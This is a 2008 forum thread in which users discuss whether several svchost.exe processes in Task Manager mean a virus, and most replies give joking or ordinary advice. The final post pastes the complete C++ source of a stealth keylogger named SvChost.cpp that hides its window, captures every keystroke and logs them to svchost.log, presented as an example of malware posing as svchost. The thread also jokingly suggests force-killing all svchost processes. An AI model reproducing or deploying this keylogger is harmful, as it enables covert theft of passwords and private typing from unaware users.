sc0rpi0 Posted January 7, 2008 Share Posted January 7, 2008 I just checked my taskmanager and there are 8 incidents of svchost.exe. Does this probably mean I have a virus? Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted January 7, 2008 Share Posted January 7, 2008 yes best way check google on how to remove it Quote Link to comment Share on other sites More sharing options...
digip Posted January 7, 2008 Share Posted January 7, 2008 yes best way check google on how to remove it :shock: Oh nooooos...I must have a virus as well... Quote Link to comment Share on other sites More sharing options...
felony_destined Posted January 8, 2008 Share Posted January 8, 2008 yeah, I've had that before but what scared me the most was the part that said 'host' (svcHOST.exe) what am I hosting? I certainly hope not any type of remote access service. Quote Link to comment Share on other sites More sharing options...
Sparda Posted January 8, 2008 Share Posted January 8, 2008 :shock: Oh nooooos...I must have a virus as well... I has a init! I has to reinstall my Kubuntu! Quote Link to comment Share on other sites More sharing options...
K1u Posted January 11, 2008 Share Posted January 11, 2008 It is normal to have various instances of svchost... it maintains several internal processes so it is normal to have various running. Does this mean that it is safe? Absolutely not, someone could have easily created a application to name itself as svchost.exe and make itself a SYSTEM process. How will you ever know the difference? Well... AV's, etc... may detect some differences in specific things of the process. Is it possible to make it undetectable by AV's? Yes. Quote Link to comment Share on other sites More sharing options...
arran Posted January 11, 2008 Share Posted January 11, 2008 Multiple instances of svchost.exe doesn't necessarily mean your infected with a virus. Anyway just to be sure check entries under HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvcHost http://support.microsoft.com/kb/314056 Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted January 18, 2008 Share Posted January 18, 2008 Just "taskkill /f /im svchost.exe" see what happens, if nothing bad does, it was a virus move tho the next one, hehe. (jk) Quote Link to comment Share on other sites More sharing options...
digip Posted January 18, 2008 Share Posted January 18, 2008 (jk) Yeah, its going to kill all of them including the legit ones and cause a reboot. You can use the PID though instead to go one at a time to make sure its a legit file. Kill only the one in question. TASKKILL /F /PID 1234 /T where 1234 is the PID of the program in question and T kills any processes started by the rougue program. Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted January 18, 2008 Share Posted January 18, 2008 in the end you have a virus you phail at keeping you computer clean, go get some antivirus Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted January 19, 2008 Share Posted January 19, 2008 It is normal to have various instances of svchost... it maintains several internal processes so it is normal to have various running. Does this mean that it is safe? Absolutely not, someone could have easily created a application to name itself as svchost.exe and make itself a SYSTEM process. You mean like this: /*########################################################## ## SvChost.cpp ## ## Writen by Ep$sil0n ## ## Language C Plus Plus ## ## Features Stealth Keyloggger, Writes to file SvChost.log## ###########################################################*/ #include <windows.h> #include <stdio.h> #include <winuser.h> #include <windowsx.h> #define BUFSIZE 80 int test_key(void); int create_key(char *); int get_keys(void); int main(void) { HWND stealth; /*creating stealth (window is not visible)*/ AllocConsole(); stealth=FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); int get_keys(); return get_keys(); } int get_keys(void) { short character; while(1) { Sleep(10); // dont want 100% cpu usage for(character=8;character<=222;character++) { if(GetAsyncKeyState(character)==-32767) { FILE *file; file=fopen("svchost.log","a+"); //create file to write to if(file==NULL) { return 1; // return an error if anything goes wrong } if(file!=NULL) // if the file was created or was there { // go on with the keylogger if((character>=39)&&(character<=64)) { fputc(character,file); fclose(file); break; } else if((character>64)&&(character<91)) { character+=32; fputc(character,file); fclose(file); break; } else { switch(character) //pretty self explanatory { case VK_SPACE: fputc(' ',file); fclose(file); break; case VK_SHIFT: fputs("[SHIFT]",file); fclose(file); break; case VK_RETURN: fputs("n[ENTER]",file); fclose(file); break; case VK_BACK: fputs("[BACKSPACE]",file); fclose(file); break; case VK_TAB: fputs("[TAB]",file); fclose(file); break; case VK_CONTROL: fputs("[CTRL]",file); fclose(file); break; case VK_DELETE: fputs("[DEL]",file); fclose(file); break; case VK_OEM_1: fputs("[;:]",file); fclose(file); break; case VK_OEM_2: fputs("[/?]",file); fclose(file); break; case VK_OEM_3: fputs("[`~]",file); fclose(file); break; case VK_OEM_4: fputs("[ [{ ]",file); fclose(file); break; case VK_OEM_5: fputs("[|]",file); fclose(file); break; case VK_OEM_6: fputs("[ ]} ]",file); fclose(file); break; case VK_OEM_7: fputs("['"]",file); fclose(file); break; case VK_NUMPAD0: fputc('0',file); fclose(file); break; case VK_NUMPAD1: fputc('1',file); fclose(file); break; case VK_NUMPAD2: fputc('2',file); fclose(file); break; case VK_NUMPAD3: fputc('3',file); fclose(file); break; case VK_NUMPAD4: fputc('4',file); fclose(file); break; case VK_NUMPAD5: fputc('5',file); fclose(file); break; case VK_NUMPAD6: fputc('6',file); fclose(file); break; case VK_NUMPAD7: fputc('7',file); fclose(file); break; case VK_NUMPAD8: fputc('8',file); fclose(file); break; case VK_NUMPAD9: fputc('9',file); fclose(file); break; case VK_CAPITAL: fputs("[CAPS LOCK]",file); fclose(file); break; default: fclose(file); //close the file break; } } } } } } return EXIT_SUCCESS; //exit success :D } Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.